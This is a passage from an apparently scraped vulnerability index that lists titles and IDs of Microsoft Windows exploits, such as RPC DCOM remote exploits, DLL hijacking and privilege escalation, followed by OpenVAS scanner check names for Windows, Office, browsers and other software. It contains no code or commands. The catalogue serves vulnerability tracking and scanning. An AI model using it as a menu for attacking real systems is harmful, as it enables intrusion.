2.0/indexing services for windows 2000 - Directory Traversal [19673] Microsoft Windows 95/98/NT 4.0 Help File Trojan Vulnerability [19578] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (2) [19577] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5/SP6 Services.exe Denial of Service (1) [19502] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 RASMAN Privilege Escalation Vulnerability [19489] Microsoft Windows NT 4.0 DCOM Server Vulnerability [19462] Microsoft Windows 95/98 IE5/Telnet Heap Overflow Vulnerability [19451] Microsoft Windows 98 a/98 b/98SE,Solaris 2.6 IRDP Vulnerability [19440] Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 Malformed Dialer Entry Vulnerability [19372] Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name Vulnerability [19359] Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4,Windows NT 3.5.1/SP1/SP2/SP3/SP4/SP5 Screensaver Vulnerability [19239] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability [19238] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 DoS Duplicate Hostname Vulnerability [19211] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Phonebook Buffer Overflow Vulnerability [19209] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Help File Buffer Overflow Vulnerability [19198] Microsoft Windows NT <= 4.0 SP4 Known DLL Cache Vulnerability [19197] "Microsoft Windows NT <= 4.0 SP5,Terminal Server 4.0 ""Pass the Hash"" with Modified SMB Client Vulnerability" [19196] "Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Dial-up Networking ""Save Password"" Vulnerability" [19195] Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 LSA Secrets Vulnerability [19143] "Microsoft Windows ""April Fools 2001"" Vulnerability" [19113] Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Telnetd Vulnerability [19103] HP HP-UX <= 10.34,Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 [19002] Microsoft Windows OLE Object File Handling Remote Code Execution [18819] Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability [18372] Microsoft Windows Assembly Execution Vulnerability MS12-005 [17305] "Microsoft Windows Vista/Server 2008 ""nsiproxy.sys"" Local Kernel DoS Exploit" [17133] Microsoft Windows xp AFD.sys Local Kernel DoS Exploit [17037] PostgreSQL for Microsoft Windows Payload Execution [16957] Oracle MySQL for Microsoft Windows Payload Execution [16749] Microsoft RPC DCOM Interface Overflow [16748] Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP) [16660] Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow [16574] Microsoft Windows Shell LNK Code Execution [16374] Microsoft Windows Authenticated User Code Execution [16366] Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) [16363] Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference [16360] Microsoft Windows SMB Relay Code Execution [15839] Microsoft Windows Fax Services Cover Page Editor (.cov) Memory Corruption [14778] Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll) [14733] Microsoft Windows 7 wab.exe DLL Hijacking Exploit (wab32res.dll) [14731] Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx) [14705] Microsoft Windows (IcmpSendEcho2Ex interrupting) Denial of Service Vulnerability [14674] Microsoft Windows SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (MS09-050) [14670] Microsoft Windows nt!SeObjectCreateSaclAccessBits() Missed ACE Bounds Checks (MS10-047) [14669] Microsoft Windows win32k!GreStretchBltInternal() Does Not Handle src == dest [14668] Microsoft Windows win32k!xxxRealDrawMenuItem() Missing HBITMAP Bounds Checks [14667] Microsoft Windows KTM Invalid Free with Reused Transaction GUID (MS10-047) [14666] Microsoft Windows nt!NtCreateThread Race Condition with Invalid Code Segment (MS10-047) [14611] Microsoft Windows 'SfnLOGONNOTIFY' Local Privilege Escalation Vulnerability (MS10-048) [14610] Microsoft Windows Tracing Registry Key ACL Privilege Escalation Vulnerability [14608] Microsoft Windows CreateWindow Function Callback Vulnerability (MS10-048) [14566] "Microsoft Windows win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow" [14403] Microsoft Windows Automatic LNK Shortcut File Code Execution [13808] Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly [13532] MS Windows (DCOM RPC2) Universal Shellcode [12564] Microsoft Windows Outlook Express and Windows Mail Integer Overflow [11195] Microsoft Windows Defender ActiveX Heap Overflow PoC [10068] Microsoft Windows 2000-2008 Embedded OpenType Font Engine Remote Code Execution [9301] Microsoft Windows XP (win32k.sys) Local Privilege Escalation Exploit [4934] MS Windows Message Queuing Service RPC BOF Exploit (dnsname) [4745] MS Windows Message Queuing Service RPC BOF Exploit (MS07-065) [4045] Microsoft Windows Animated Cursor Stack Overflow Exploit [3737] MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4) [3453] MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption [1352] Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated) [293] MS Windows Lsasrv.dll RPC Remote Buffer Overflow Exploit (MS04-011) [117] MS Windows XP/2000 RPC Remote (non exec memory) Exploit [109] MS Windows (RPC2) Universal Exploit & DoS (RPC3) (MS03-039) [103] MS Windows (RPC DCOM2) Remote Exploit (MS03-039) [100] MS Windows (RPC DCOM) Long Filename Overflow Exploit (MS03-026) [97] MS Windows (RPC DCOM) Scanner (MS03-039) [76] MS Windows (RPC DCOM) Remote Exploit (Universal Targets) [70] MS Windows (RPC DCOM) Remote Exploit (48 Targets) [69] MS Windows RPC DCOM Remote Exploit (18 Targets) [66] MS Windows (RPC DCOM) Remote Exploit (w2k+XP Targets) [64] MS Windows (RPC DCOM) Remote Buffer Overflow Exploit [61] MS Windows 2000 RPC DCOM Interface DoS Exploit [5] MS Windows RPC Locator Service Remote Exploit OpenVAS (Nessus) - http://www.openvas.org: [903041] Microsoft Windows Kernel Privilege Elevation Vulnerability (2724197) [903036] Microsoft Windows Networking Components Remote Code Execution Vulnerabilities (2733594) [903035] Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerability (2731847) [903033] Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2718523) [902936] Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2783534) [902933] Microsoft Windows Shell Remote Code Execution Vulnerabilities (2727528) [902916] Microsoft Windows Kernel Privilege Elevation Vulnerabilities (2711167) [902909] Microsoft Windows Service Pack Missing Multiple Vulnerabilities [902908] Microsoft Windows DirectWrite Denial of Service Vulnerability (2665364) [902906] Microsoft Windows DNS Server Denial of Service Vulnerability (2647170) [902900] Microsoft Windows SSL/TLS Information Disclosure Vulnerability (2643584) [902846] Microsoft Windows TLS Protocol Information Disclosure Vulnerability (2655992) [902845] Microsoft Windows Shell Remote Code Execution Vulnerability (2691442) [902829] Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258) [902807] Microsoft Windows Media Could Allow Remote Code Execution Vulnerabilities (2636391) [902784] Microsoft Windows Object Packager Remote Code Execution Vulnerability (2603381) [902783] Microsoft Windows Kernel Security Feature Bypass Vulnerability (2644615) [902782] MicroSoft Windows Server Service Remote Code Execution Vulnerability (921883) [902766] Microsoft Windows Kernel Privilege Elevation Vulnerability (2633171) [902694] Microsoft Windows IIS FTP Service Information Disclosure Vulnerability (2761226) [902693] Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2761226) [902687] Microsoft Windows Data Access Components Remote Code Execution Vulnerability (2698365) [902677] Microsoft Windows Prtition Manager Privilege Elevation Vulnerability (2690533) [902676] Microsoft Windows TCP/IP Privilege Elevation Vulnerabilities (2688338) [902609] Microsoft Windows CSRSS Privilege Escalation Vulnerabilities (2507938) [902598] Microsoft Windows Time Component Remote Code Execution Vulnerability (2618451) [902597] Microsoft Windows Media Remote Code Execution Vulnerability (2648048) [902596] Microsoft Windows OLE Remote Code Execution Vulnerability (2624667) [902588] Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability [902566] Microsoft Windows WINS Local Privilege Escalation Vulnerability (2571621) [902516] Microsoft Windows WINS Remote Code Execution Vulnerability (2524426) [902487] Microsoft Windows Active Directory LDAPS Authentication Bypass Vulnerability (2630837) [902484] Microsoft Windows TCP/IP Remote Code Execution Vulnerability (2588516) [902463] Microsoft Windows Client/Server Run-time Subsystem Privilege Escalation Vulnerability (2567680) [902440] Microsoft Windows SMB Server Remote Code Execution Vulnerability (2536275) [902425] Microsoft Windows SMB Accessible Shares [902403] Microsoft Windows Fraudulent Digital Certificates Spoofing Vulnerability [902377] Microsoft Windows OLE Automation Remote Code Execution Vulnerability (2476490) [902337] Microsoft Windows Kernel Elevation of Privilege Vulnerability (2393802) [902290] Microsoft Windows Active Directory SPN Denial of Service (2478953) [902289] Microsoft Windows LSASS Privilege Escalation Vulnerability (2478960) [902281] Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910) [902280] Microsoft Windows BranchCache Remote Code Execution Vulnerability (2385678) [902277] Microsoft Windows Netlogon Service Denial of Service Vulnerability (2207559) [902276] Microsoft Windows Task Scheduler Elevation of Privilege Vulnerability (2305420) [902269] Microsoft Windows SMB Server NTLM Multiple Vulnerabilities (971468) [902263] Microsoft Windows Media Player Network Sharing Remote Code Execution Vulnerability (2281679) [902262] Microsoft Windows Shell and WordPad COM Validation Vulnerability (2405882) [902256] Microsoft Windows win32k.sys Driver 'CreateDIBPalette()' BOF Vulnerability [902232] Microsoft Windows TCP/IP Privilege Elevation Vulnerabilities (978886) [902231] Microsoft Windows Tracing Feature Privilege Elevation Vulnerabilities (982799) [902227] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [902226] Microsoft Windows Shell Remote Code Execution Vulnerability (2286198) [902094] Microsoft Windows Kernel Mode Drivers Privilege Elevation Vulnerabilities (2160329) [902093] Microsoft Windows Kernel Privilege Elevation Vulnerabilities (981852) [902067] Microsoft Windows Kernel Mode Drivers Privilege Escalation Vulnerabilities (979559) [902033] Microsoft Windows '.ani' file Denial of Service vulnerability [901305] Microsoft Windows IP-HTTPS Component Security Feature Bypass Vulnerability (2765809) [901304] Microsoft Windows File Handling Component Remote Code Execution Vulnerability (2758857) [901301] Microsoft Windows Kerberos Denial of Service Vulnerability (2743555) [901212] Microsoft Windows DirectPlay Remote Code Execution Vulnerability (2770660) [901211] Microsoft Windows Common Controls Remote Code Execution Vulnerability (2720573) [901209] Microsoft Windows Media Center Remote Code Execution Vulnerabilities (2604926) [901205] Microsoft Windows Components Remote Code Execution Vulnerabilities (2570947) [901193] Microsoft Windows Media Remote Code Execution Vulnerabilities (2510030) [901169] Microsoft Windows Address Book Remote Code Execution Vulnerability (2423089) [901164] Microsoft Windows SChannel Denial of Service Vulnerability (2207566) [901163] Microsoft Windows Media Player Remote Code Execution Vulnerability (2378111)) [901150] Microsoft Windows Print Spooler Service Remote Code Execution Vulnerability(2347290) [901140] Microsoft Windows SMB Code Execution and DoS Vulnerabilities (982214) [901119] Microsoft Windows OpenType Compact Font Format Driver Privilege Escalation Vulnerability (980218) [901102] Microsoft Windows Media Services Remote Code Execution Vulnerability (980858) [901065] Microsoft Windows IAS Remote Code Execution Vulnerability (974318) [901064] Microsoft Windows ADFS Remote Code Execution Vulnerability (971726) [901063] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [901048] Microsoft Windows Active Directory Denial of Service Vulnerability (973309) [901012] Microsoft Windows Media Format Remote Code Execution Vulnerability (973812) [900965] Microsoft Windows SMB2 Negotiation Protocol Remote Code Execution Vulnerability [900963] Microsoft Windows Kernel Privilege Escalation Vulnerability (971486) [900957] Microsoft Windows Patterns & Practices EntLib DOS Vulnerability [900956] Microsoft Windows Patterns & Practices EntLib Version Detection [900908] Microsoft Windows Message Queuing Privilege Escalation Vulnerability (971032) [900907] Microsoft Windows AVI Media File Parsing Vulnerabilities (971557) [900886] Microsoft Windows Kernel-Mode Drivers Multiple Vulnerabilities (969947) [900881] Microsoft Windows Indexing Service ActiveX Vulnerability (969059) [900880] Microsoft Windows ATL COM Initialization Code Execution Vulnerability (973525) [900879] Microsoft Windows Media Player ASF Heap Overflow Vulnerability (974112) [900877] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [900876] Microsoft Windows CryptoAPI X.509 Spoofing Vulnerabilities (974571) [900873] Microsoft Windows DNS Devolution Third-Level Domain Name Resolving Weakness (971888) [900838] Microsoft Windows TCP/IP Remote Code Execution Vulnerability (967723) [900814] Microsoft Windows WINS Remote Code Execution Vulnerability (969883) [900757] Microsoft Windows Media Player '.AVI' File DOS Vulnerability [900740] Microsoft Windows Kernel Could Allow Elevation of Privilege (977165) [900568] Microsoft Windows Search Script Execution Vulnerability (963093) [900465] Microsoft Windows DNS Memory Corruption Vulnerability - Mar09 [900404] Microsoft Windows RTCP Unspecified Remote DoS Vulnerability [900336] Microsoft Windows Media Player MID File Integer Overflow Vulnerability [900297] Microsoft Windows Kernel Denial of Service Vulnerability (2556532) [900296] Microsoft Windows TCP/IP Stack Denial of Service Vulnerability (2563894) [900295] Microsoft Windows DNS Server Remote Code Execution Vulnerability (2562485) [900281] Microsoft IE Developer Tools WMITools and Windows Messenger ActiveX Control Vulnerability (2508272) [900280] Microsoft Windows SMB Server Remote Code Execution Vulnerability (2508429) [900266] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (2424434) [900263] Microsoft Windows OpenType Compact Font Format Driver Privilege Escalation Vulnerability (2296199) [900248] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (981997) [900241] Microsoft Outlook Express and Windows Mail Remote Code Execution Vulnerability (978542) [900240] Microsoft Exchange and Windows SMTP Service Denial of Service Vulnerability (981832) [900237] Microsoft Windows Authentication Verification Remote Code Execution Vulnerability (981210) [900236] Microsoft Windows Kernel Could Allow Elevation of Privilege (979683) [900235] Microsoft Windows Media Player Could Allow Remote Code Execution (979402) [900232] Microsoft Windows Movie Maker Could Allow Remote Code Execution Vulnerability (975561) [900230] Microsoft Windows SMB Server Multiple Vulnerabilities (971468) [900227] Microsoft Windows Shell Handler Could Allow Remote Code Execution Vulnerability (975713) [900178] Microsoft Windows 'UnhookWindowsHookEx' Local DoS Vulnerability [900173] Microsoft Windows Media Player Version Detection [900172] Microsoft Windows Media Player 'MIDI' or 'DAT' File DoS Vulnerability [900108] Microsoft Windows NSlookup.exe Remote Code Execution Vulnerability [803007] Microsoft Windows Minimum Certificate Key Length Spoofing Vulnerability (2661254) [802888] Microsoft Windows Media Service Handshake Sequence DoS Vulnerability [802677] CA ARCserve Backup RPC Services Multiple Vulnerabilities (Windows) [802634] Microsoft Windows Unauthorized Digital Certificates Spoofing Vulnerability (2718704) [802500] Microsoft Windows TrueType Font Parsing Privilege Elevation Vulnerability [802426] Microsoft Windows ActiveX Control Multiple Vulnerabilities (2647518) [802383] Microsoft Windows Color Control Panel Privilege Escalation Vulnerability [802379] Microsoft Windows Kernel 'win32k.sys' Memory Corruption Vulnerability [802260] Microsoft Windows WINS Remote Code Execution Vulnerability (2524426) [802140] Microsoft Explorer HTTPS Sessions Multiple Vulnerabilities (Windows) [802136] Microsoft Windows Insecure Library Loading Vulnerability (2269637) [801991] Microsoft Windows SMB/NETBIOS NULL Session Authentication Bypass Vulnerability [801966] Microsoft Windows ActiveX Control Multiple Vulnerabilities (2562937) [801914] Microsoft Windows IPv4 Default Configuration Security Bypass Vulnerability [801719] Microsoft Windows CSRSS CSRFinalizeContext Local Privilege Escalation Vulnerability (930178) [801718] Microsoft Windows Vista Information Disclosure Vulnerability (931213) [801717] Microsoft Windows Vista Teredo Interface Firewall Bypass Vulnerability [801716] Microsoft Outlook Express/Windows Mail MHTML URI Handler Information Disclosure Vulnerability (929123) [801713] Microsoft Outlook Express And Windows Mail NNTP Protocol Heap Buffer Overflow Vulnerability (941202) [801706] Microsoft Windows TCP/IP Remote Code Execution Vulnerabilities (941644) [801705] Microsoft Windows TCP/IP Denial of Service Vulnerability (946456) [801701] Microsoft Windows DNS Client Service Response Spoofing Vulnerability (945553) [801669] Microsoft Windows IIS FTP Server DOS Vulnerability [801598] Microsoft Windows2k3 Active Directory 'BROWSER ELECTION' Buffer Overflow Vulnerability [801580] Microsoft Windows Fax Cover Page Editor BOF Vulnerabilities [801527] Microsoft Windows 32-bit Platforms Unspecified vulnerabilities [801487] Microsoft Windows Kernel Usermode Callback Local Privilege Elevation Vulnerability (941693) [801486] Microsoft Windows Speech Components Voice Recognition Command Execution Vulnerability (950760) [801484] Microsoft Windows IPsec Policy Processing Information Disclosure Vulnerability (953733) [801483] Microsoft Windows Search Remote Code Execution Vulnerability (959349) [801482] Microsoft Windows ASP.NET Denial of Service Vulnerability(970957) [801479] Microsoft Windows TCP/IP Could Allow Remote Code Execution (974145) [801457] Microsoft Windows Address Book Insecure Library Loading Vulnerability [801456] Microsoft Windows Progman Group Converter Insecure Library Loading Vulnerability [801333] Microsoft Windows Kernel 'win32k.sys' Multiple DOS Vulnerabilities [801090] Microsoft Windows Indeo Codec Multiple Vulnerabilities [800862] Microsoft Windows Kernel win32k.sys Privilege Escalation Vulnerability [800687] Microsoft Windows Server 2003 OpenType Font Engine DoS Vulnerability [800577] Microsoft Windows Server 2003 win32k.sys DoS Vulnerability [800504] Microsoft Windows XP SP3 denial of service vulnerability [800480] Microsoft Windows Media Player '.mpg' Buffer Overflow Vulnerability [800466] Microsoft Windows TLS/SSL Spoofing Vulnerability (977377) [800442] Microsoft Windows GP Trap Handler Privilege Escalation Vulnerability [800332] Microsoft Windows Live Messenger Information Disclosure Vulnerability [800331] Microsoft Windows Live Messenger Client Version Detection [800328] Integer Overflow vulnerability in Microsoft Windows Media Player [800310] Microsoft Windows Media Services nskey.dll ActiveX BOF Vulnerability [800023] Microsoft Windows Image Color Management System Code Execution Vulnerability (952954) [102059] Microsoft Windows Vector Markup Language Buffer Overflow (938127) [102055] Microsoft Windows GDI Multiple Vulnerabilities (925902) [102053] Microsoft Windows Vector Markup Language Vulnerabilities (929969) [102015] Microsoft RPC Interface Buffer Overrun (KB824146) [100624] Microsoft Windows SMTP Server DNS spoofing vulnerability [100596] Microsoft Windows SMTP Server MX Record Denial of Service Vulnerability [100283] Microsoft Windows SMB2 '_Smb2ValidateProviderCallback()' Remote Code Execution Vulnerability [90024] Windows Vulnerability in Microsoft Jet Database Engine [11808] Microsoft RPC Interface Buffer Overrun (823980) [903037] Microsoft JScript and VBScript Engines Remote Code Execution Vulnerability (2706045) [903030] Google Chrome Multiple Vulnerabilities(02) - May 12 (Windows) [903029] Apple Safari Multiple Vulnerabilities - Oct 2011 (Windows) [903026] Microsoft Office Remote Code Execution Vulnerabilities (2663830) [903017] Microsoft Office Remote Code Execution Vulnerability (2639185) [903014] Adobe Flash Player/Air Code Execution and DoS Vulnerabilities (Windows) [903007] Google Chrome Full Sandbox Escape and Code Execution Vulnerability (Windows) [903004] Google Chrome Multiple Vulnerabilities (Windows) - Mar 12 [903003] GOM Media Player 'Open URL' Feature Unspecified Vulnerability (Windows) [903002] GOM Media Player 'AVI' File Unspecified Vulnerability (Windows) [903000] Microsoft Expression Design Remote Code Execution Vulnerability (2651018) [902934] Microsoft .NET Framework Remote Code Execution Vulnerability (2745030) [902932] Microsoft Internet Explorer Multiple Use-After-Free Vulnerabilities (2761451) [902931] Microsoft Office Remote Code Execution Vulnerabilities - 2720184 (Mac OS X) [902930] Microsoft Office Remote Code Execution Vulnerabilities (2720184) [902923] Microsoft Internet Explorer Multiple Vulnerabilities (2722913) [902922] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability (2723135) [902921] Microsoft Office Visio/Viewer Remote Code Execution Vulnerability (2733918) [902920] Microsoft Office Remote Code Execution Vulnerability (2731879) [902919] Microsoft SharePoint Privilege Elevation Vulnerabilities (2663841) [902917] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2709162) [902914] Microsoft IIS GET Request Denial of Service Vulnerability [902913] Microsoft Office Remote Code Execution Vulnerabilities-2663830 (Mac OS X) [902912] Microsoft Office Word Remote Code Execution Vulnerability-2680352 (Mac OS X) [902911] Microsoft Office Word Remote Code Execution Vulnerability (2680352) [902910] Microsoft Office Visio Viewer Remote Code Execution Vulnerability (2597981) [902907] Windows Kernel-Mode Drivers Privilege Elevation Vulnerability (2641653) [902903] Google Chrome Multiple Vulnerabilities - Jan12 (Windows) [902842] Microsoft Lync Remote Code Execution Vulnerabilities (2707956) [902841] Microsoft .NET Framework Remote Code Execution Vulnerability (2706726) [902839] Microsoft FrontPage Server Extensions MS-DOS Device Name DoS Vulnerability [902837] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability (Windows) [902836] PHP 'com_print_typeinfo()' Remote Code Execution Vulnerability (Windows) [902833] Microsoft .NET Framework Remote Code Execution Vulnerability (2693777) [902832] MS Security Update For Microsoft Office, .NET Framework, and Silverlight (2681578) [902828] Microsoft .NET Framework Remote Code Execution Vulnerability (2671605) [902818] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerabilities (2671387) [902817] Microsoft Visual Studio Privilege Elevation Vulnerability (2651019) [902811] Microsoft .NET Framework and Microsoft Silverlight Remote Code Execution Vulnerabilities (2651026) [902810] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2660465) [902808] IBM Lotus Symphony Image Object Integer Overflow Vulnerability (Windows) [902798] Microsoft SMB Signing Enabled and Not Required At Server [902797] Microsoft SMB Signing Information Disclosure Vulnerability [902796] Microsoft IIS IP Address/Internal Network Name Disclosure Vulnerability [902792] MS Windows Indeo Codec Remote Code Execution Vulnerability (2661637) [902791] MS Windows Color Control Panel Remote Code Execution Vulnerability (2643719) [902786] Oracle VM VirtualBox Multiple Unspecified Vulnerabilities (Windows) [902785] Microsoft AntiXSS Library Information Disclosure Vulnerability (2607664) [902781] Windows Media Player Denial Of Service Vulnerability [902775] Mozilla Products Multiple Vulnerabilities - Dec 11 (Windows) [902774] Mozilla Products DOMAttrModified Memory Corruption Vulnerability (Windows) [902770] FFFTP Untrusted Search Path Vulnerability (Windows) - Dec 11 [902768] MS Windows Active Directory Remote Code Execution Vulnerability (2640045) [902767] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053) [902765] Adobe Flex SDK 'SWF' Files Cross-Site Scripting Vulnerability (Windows) [902760] ClamAV Recursion Level Handling Denial of Service Vulnerability (Windows) [902746] Microsoft Active Accessibility Remote Code Execution Vulnerability (2623699) [902738] Adobe Flash Player Multiple Vulnerabilities September-2011 (Windows) [902727] Microsoft Office Excel Remote Code Execution Vulnerabilities (2587505) [902725] Nfs-utils rpc.statd Multiple Remote Format String Vulnerabilities [902709] Adobe Air and Flash Player Multiple Vulnerabilities August-2011 (Windows) [902708] Microsoft Remote Desktop Protocol Denial of Service Vulnerability (2570222) [902705] VLC Media Player '.AVI' File BOF Vulnerability (Windows) [902704] VLC Media Player '.RM' File BOF Vulnerability (Windows) [902696] Microsoft Internet Explorer Multiple Vulnerabilities (2761465) [902692] Microsoft Office Excel ReadAV Arbitrary Code Execution Vulnerability [902689] Microsoft SQL Server Report Manager Cross Site Scripting Vulnerability (2754849) [902688] Microsoft System Center Configuration Manager XSS Vulnerability (2741528) [902686] Microsoft Internet Explorer Multiple Vulnerabilities (2719177) [902683] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerability (2685939) [902682] Microsoft Internet Explorer Multiple Vulnerabilities (2699988) [902679] Google SketchUp '.SKP' File Remote Code Execution Vulnerability (Windows) [902678] Microsoft Silverlight Code Execution Vulnerabilities - 2681578 (Mac OS X) [902670] Microsoft Internet Explorer Multiple Vulnerabilities (2675157) [902669] Windows Authenticode Signature Remote Code Execution Vulnerability (2653956) [902666] Opera Multiple Vulnerabilities - March12 (Windows) [902663] Microsoft Remote Desktop Protocol Remote Code Execution Vulnerabilities (2671387) [902662] MicroSoft SMB Server Trans2 Request Remote Code Execution Vulnerability [902660] Microsoft SMB Transaction Parsing Remote Code Execution Vulnerability [902658] Microsoft RDP Server Private Key Information Disclosure Vulnerability [902657] Windows ClickOnce Application Installer Remote Code Execution Vulnerability (2584146) [902653] MS Windows C Run-Time Library Remote Code Execution Vulnerability (2654428) [902649] Microsoft Internet Explorer Multiple Vulnerabilities (2647516) [902645] Google Chrome Multiple Vulnerabilities - December11 (Windows) [902643] Windows Client/Server Run-time Subsystem Privilege Elevation Vulnerability (2620712) [902642] Microsoft Internet Explorer Multiple Vulnerabilities (2618444) [902638] Apple iTunes Remote Code Execution Vulnerability (Windows) [902635] Google Chrome V8 Remote Code Execution Vulnerability (Windows) [902626] Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048) [902625] Microsoft SharePoint Multiple Privilege Escalation Vulnerabilities (2451858) [902614] Google Chrome Secure Cookie Security Bypass Vulnerability (Windows) [902613] Microsoft Internet Explorer Multiple Vulnerabilities (2559049) [902603] VLC Media Player XSPF Playlist Integer Overflow Vulnerability (Windows) [902581] Microsoft .NET Framework and Silverlight Remote Code Execution Vulnerability (2604930) [902580] Microsoft Host Integration Server Denial of Service Vulnerabilities (2607670) [902567] Microsoft Office Remote Code Execution Vulnerabilites (2587634) [902561] McAfee SaaS Endpoint Protection Version Detection (Windows) [902552] Microsoft .NET Framework Chart Control Information Disclosure Vulnerability (2567943) [902551] Microsoft .NET Framework Information Disclosure Vulnerability (2567951) [902549] Oracle VM VirtualBox Unspecified Vulnerability (Windows) [902546] IBM Informix Dynamic Server Oninit Remote Code Execution Vulnerability (Windows) [902545] IBM Informix Dynamic Server Version Detection (Windows) [902538] Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2555917) [902529] ejabberd Version Detection (Windows) [902527] ejabberd XML Parsing Denial of Service Vulnerability (Windows) [902525] Oracle Java SE Multiple Unspecified Vulnerabilities 01 - June11 (Windows) [902524] Oracle Java SE Multiple Unspecified Vulnerabilities - June11 (Windows) [902523] Microsoft .NET Framework and Silverlight Remote Code Execution Vulnerability (2514842) [902522] Microsoft .NET Framework Remote Code Execution Vulnerability (2538814) [902518] Microsoft .NET Framework Security Bypass Vulnerability [902502] Microsoft .NET Framework Remote Code Execution Vulnerability (2484015) [902501] Microsoft JScript and VBScript Scripting Engines Remote Code Execution Vulnerability (2514666) [902499] MS Windows Client/Server Run-time Subsystem Privilege Escalation Vulnerability (2646524) [902496] Microsoft Office IME (Chinese) Privilege Elevation Vulnerability (2652016) [902495] Microsoft Office Remote Code Execution Vulnerability (2590602) [902494] Microsoft Office Excel Remote Code Execution Vulnerability (2640241) [902493] Microsoft Publisher Remote Code Execution Vulnerabilities (2607702) [902492] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2639142) [902486] Windows Mail and Windows Meeting Space Remote Code Execution Vulnerability (2620704) [902485] Windows Kernel-Mode Drivers Remote Code Execution Vulnerability (2617657) [902483] Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2567053) [902482] MS Windows Ancillary Function Driver Privilege Elevation Vulnerability (2592799) [902477] CDE ToolTalk RPC Database Server Multiple Vulnerabilities [902464] Microsoft Visio Remote Code Execution Vulnerabilities (2560978) [902462] CA ARCserver D2D GWT RPC Request Multiple Vulnerabilities [902455] Microsoft Visio Remote Code Execution Vulnerability (2560847) [902445] Microsoft XML Editor Information Disclosure Vulnerability (2543893) [902444] MS Windows Threat Management Gateway Firewall Client Remote Code Execution Vulnerability (2520426 [902443] Microsoft Internet Explorer Multiple Vulnerabilities (2530548) [902442] MS Windows Ancillary Function Driver Privilege Elevation Vulnerability [902441] Windows MHTML Information Disclosure Vulnerability (2544893) [902430] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2545814) [902424] MS Windows Ancillary Function Driver Privilege Elevation Vulnerabilities (2645640) [902423] Microsoft Office Visio Viewer Remote Code Execution Vulnerabilities (2663510) [902411] Microsoft Office PowerPoint Remote Code Execution Vulnerabilities (2489283) [902410] Microsoft Office Excel Remote Code Execution Vulnerabilities (2489279) [902409] Windows MHTML Information Disclosure Vulnerability (2503658) [902408] Windows Fax Cover Page Editor Remote Code Execution Vulnerability (2527308) [902400] Adobe Products Remote Memory Corruption Vulnerability (Windows) [902399] LibreOffice LWP File Processing Multiple Buffer Overflow Vulnerabilities (Windows) [902398] LibreOffice Version Detection (Windows) [902395] Microsoft Bluetooth Stack Remote Code Execution Vulnerability (2566220) [902392] Google Chrome Multiple Vulnerabilities (Windows) - June 11 [902387] Adobe Reader/Acrobat Security Bypass Vulnerability (Windows) [902382] Google Chrome Multiple Vulnerabilities May11 (Windows) [902379] Adobe Reader/Acrobat Memory Corruption Vulnerability (Windows) [902378] Microsoft Office Excel Remote Code Execution Vulnerabilities (2537146) [902373] Adobe Audition '.ses' Multiple Buffer Overflow Vulnerabilities (Windows) [902365] Microsoft GDI+ Remote Code Execution Vulnerability (2489979) [902364] Microsoft Office Remote Code Execution Vulnerabilites (2489293) [902363] Windows OpenType Compact Font Format (CFF) Driver Remote Code Execution Vulnerability (2507618) [902353] Oracle Java 